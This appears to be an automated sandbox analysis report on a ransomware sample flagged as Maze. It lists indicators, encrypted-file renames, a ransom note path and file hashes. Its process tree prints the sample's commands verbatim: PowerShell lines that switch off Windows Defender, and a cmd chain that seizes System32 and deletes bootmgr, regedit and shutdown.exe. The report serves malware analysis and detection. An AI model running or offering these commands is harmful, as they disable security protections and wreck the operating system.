Analysis
-
max time kernel
375s -
max time network
1816s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
27-10-2021 09:06
Static task
static1
Behavioral task
behavioral1
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
b53415f6_lcvDB3iF4J.exe
Resource
win11
General
Malware Config
Extracted
C:\Users\Admin\Desktop\DECRYPT-FILES.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
Processes:
VSSVC.exepid Process 1352 VSSVC.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
VSSVC.exedescription ioc Process File renamed C:\Users\Admin\Pictures\GrantJoin.png => C:\Users\Admin\Pictures\GrantJoin.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\InitializeLimit.raw => C:\Users\Admin\Pictures\InitializeLimit.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\NewHide.crw => C:\Users\Admin\Pictures\NewHide.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\SaveDeny.png => C:\Users\Admin\Pictures\SaveDeny.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\UnprotectUpdate.raw => C:\Users\Admin\Pictures\UnprotectUpdate.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\ClearSuspend.raw => C:\Users\Admin\Pictures\ClearSuspend.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\ExpandSave.crw => C:\Users\Admin\Pictures\ExpandSave.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\InvokeUndo.crw => C:\Users\Admin\Pictures\InvokeUndo.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\ProtectLimit.raw => C:\Users\Admin\Pictures\ProtectLimit.raw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
takeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid Process 368 takeown.exe 828 takeown.exe 2304 icacls.exe 3160 takeown.exe 1468 icacls.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
VSSVC.exeb53415f6_lcvDB3iF4J.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b53415f6_lcvDB3iF4J.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exetakeown.exetakeown.exeicacls.exetakeown.exepid Process 1468 icacls.exe 368 takeown.exe 828 takeown.exe 2304 icacls.exe 3160 takeown.exe -
Processes:
resource yara_rule behavioral3/memory/2800-118-0x0000000001290000-0x0000000001291000-memory.dmp themida behavioral3/files/0x0002000000015295-138.dat themida behavioral3/files/0x0002000000015295-137.dat themida behavioral3/memory/1352-156-0x00000000009A0000-0x00000000009A1000-memory.dmp themida -
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b53415f6_lcvDB3iF4J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.exepid Process 2800 b53415f6_lcvDB3iF4J.exe 1352 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 4072 powershell.exe 3448 powershell.exe 2960 powershell.exe 3680 powershell.exe 3680 powershell.exe 2960 powershell.exe 4072 powershell.exe 3448 powershell.exe 3680 powershell.exe 3448 powershell.exe 4072 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
b53415f6_lcvDB3iF4J.exepowershell.exepowershell.exepowershell.exepowershell.exeVSSVC.exetakeown.exetakeown.exetakeown.exedescription pid Process Token: SeDebugPrivilege 2800 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 2800 b53415f6_lcvDB3iF4J.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 3680 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeDebugPrivilege 1352 VSSVC.exe Token: SeDebugPrivilege 1352 VSSVC.exe Token: SeTakeOwnershipPrivilege 828 takeown.exe Token: SeTakeOwnershipPrivilege 3160 takeown.exe Token: SeTakeOwnershipPrivilege 368 takeown.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
b53415f6_lcvDB3iF4J.exeVSSVC.execmd.exedescription pid Process procid_target PID 2800 wrote to memory of 2960 2800 b53415f6_lcvDB3iF4J.exe 70 PID 2800 wrote to memory of 2960 2800 b53415f6_lcvDB3iF4J.exe 70 PID 2800 wrote to memory of 2960 2800 b53415f6_lcvDB3iF4J.exe 70 PID 2800 wrote to memory of 3680 2800 b53415f6_lcvDB3iF4J.exe 73 PID 2800 wrote to memory of 3680 2800 b53415f6_lcvDB3iF4J.exe 73 PID 2800 wrote to memory of 3680 2800 b53415f6_lcvDB3iF4J.exe 73 PID 2800 wrote to memory of 3448 2800 b53415f6_lcvDB3iF4J.exe 72 PID 2800 wrote to memory of 3448 2800 b53415f6_lcvDB3iF4J.exe 72 PID 2800 wrote to memory of 3448 2800 b53415f6_lcvDB3iF4J.exe 72 PID 2800 wrote to memory of 4072 2800 b53415f6_lcvDB3iF4J.exe 74 PID 2800 wrote to memory of 4072 2800 b53415f6_lcvDB3iF4J.exe 74 PID 2800 wrote to memory of 4072 2800 b53415f6_lcvDB3iF4J.exe 74 PID 2800 wrote to memory of 1352 2800 b53415f6_lcvDB3iF4J.exe 78 PID 2800 wrote to memory of 1352 2800 b53415f6_lcvDB3iF4J.exe 78 PID 2800 wrote to memory of 1352 2800 b53415f6_lcvDB3iF4J.exe 78 PID 1352 wrote to memory of 3280 1352 VSSVC.exe 82 PID 1352 wrote to memory of 3280 1352 VSSVC.exe 82 PID 1352 wrote to memory of 3280 1352 VSSVC.exe 82 PID 3280 wrote to memory of 828 3280 cmd.exe 84 PID 3280 wrote to memory of 828 3280 cmd.exe 84 PID 3280 wrote to memory of 828 3280 cmd.exe 84 PID 3280 wrote to memory of 2304 3280 cmd.exe 85 PID 3280 wrote to memory of 2304 3280 cmd.exe 85 PID 3280 wrote to memory of 2304 3280 cmd.exe 85 PID 3280 wrote to memory of 3160 3280 cmd.exe 86 PID 3280 wrote to memory of 3160 3280 cmd.exe 86 PID 3280 wrote to memory of 3160 3280 cmd.exe 86 PID 3280 wrote to memory of 1468 3280 cmd.exe 87 PID 3280 wrote to memory of 1468 3280 cmd.exe 87 PID 3280 wrote to memory of 1468 3280 cmd.exe 87 PID 3280 wrote to memory of 368 3280 cmd.exe 88 PID 3280 wrote to memory of 368 3280 cmd.exe 88 PID 3280 wrote to memory of 368 3280 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"C:\Users\Admin\AppData\Local\Temp\b53415f6_lcvDB3iF4J.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3160
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
MD5
34cbce7a86066983ddec1c5c7316fa24
SHA1a1135a1ddbfd3ae8079f7e449d7978fdb92f3bd9
SHA25623bf6d99f757f6728c8c896676b0707e190e1acb80ec8758696fa3efa8d6cb42
SHA512f6537a61341ef316200de61d4185d7fdf8169fa5f01446241d34dc74ffdf9edfd520c5d06d54c9df8a8d1eb0eeab53141d75c88f157b72cbcb6b7f0bdb84e769
-
MD5
34cbce7a86066983ddec1c5c7316fa24
SHA1a1135a1ddbfd3ae8079f7e449d7978fdb92f3bd9
SHA25623bf6d99f757f6728c8c896676b0707e190e1acb80ec8758696fa3efa8d6cb42
SHA512f6537a61341ef316200de61d4185d7fdf8169fa5f01446241d34dc74ffdf9edfd520c5d06d54c9df8a8d1eb0eeab53141d75c88f157b72cbcb6b7f0bdb84e769
-
MD5
410db825bd72d30c7a2a71422f20d6c7
SHA17b82adb070e565b536f2307f17b38bcb8f518e49
SHA25647a9dc68f5e7adcc4cf34f82f819abcdf509aa86c5a1c4de9ad609f7433f930c
SHA512d3ad008c08f506a4ab9d2539bb0a9445baab8d533d05e51cf68924e284974dbfab7d36154516a9095a8df0765f7114125d646822720b7b11bc79ac2ff500e098
-
MD5
12538c1a1e8f2e1297625a9a5c791fb7
SHA1a72b6354c68b6a02239cda6b8067d5e4c1105273
SHA256ebaff7d49ba1b2203e8a6dc2c293552729915b3f4411ac6fa2b38e3aa8652e2b
SHA51235ed8f4d62e5ad4bac2063b1d4316b1a67c9eaed0d69b8d490e160b2aeadaa5edc4a6d0df8a9e3b7a2a99453c4de1f82e4febb06e2eac8650ee6ea6d8c0007af
-
MD5
12538c1a1e8f2e1297625a9a5c791fb7
SHA1a72b6354c68b6a02239cda6b8067d5e4c1105273
SHA256ebaff7d49ba1b2203e8a6dc2c293552729915b3f4411ac6fa2b38e3aa8652e2b
SHA51235ed8f4d62e5ad4bac2063b1d4316b1a67c9eaed0d69b8d490e160b2aeadaa5edc4a6d0df8a9e3b7a2a99453c4de1f82e4febb06e2eac8650ee6ea6d8c0007af
-
MD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
MD5
e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00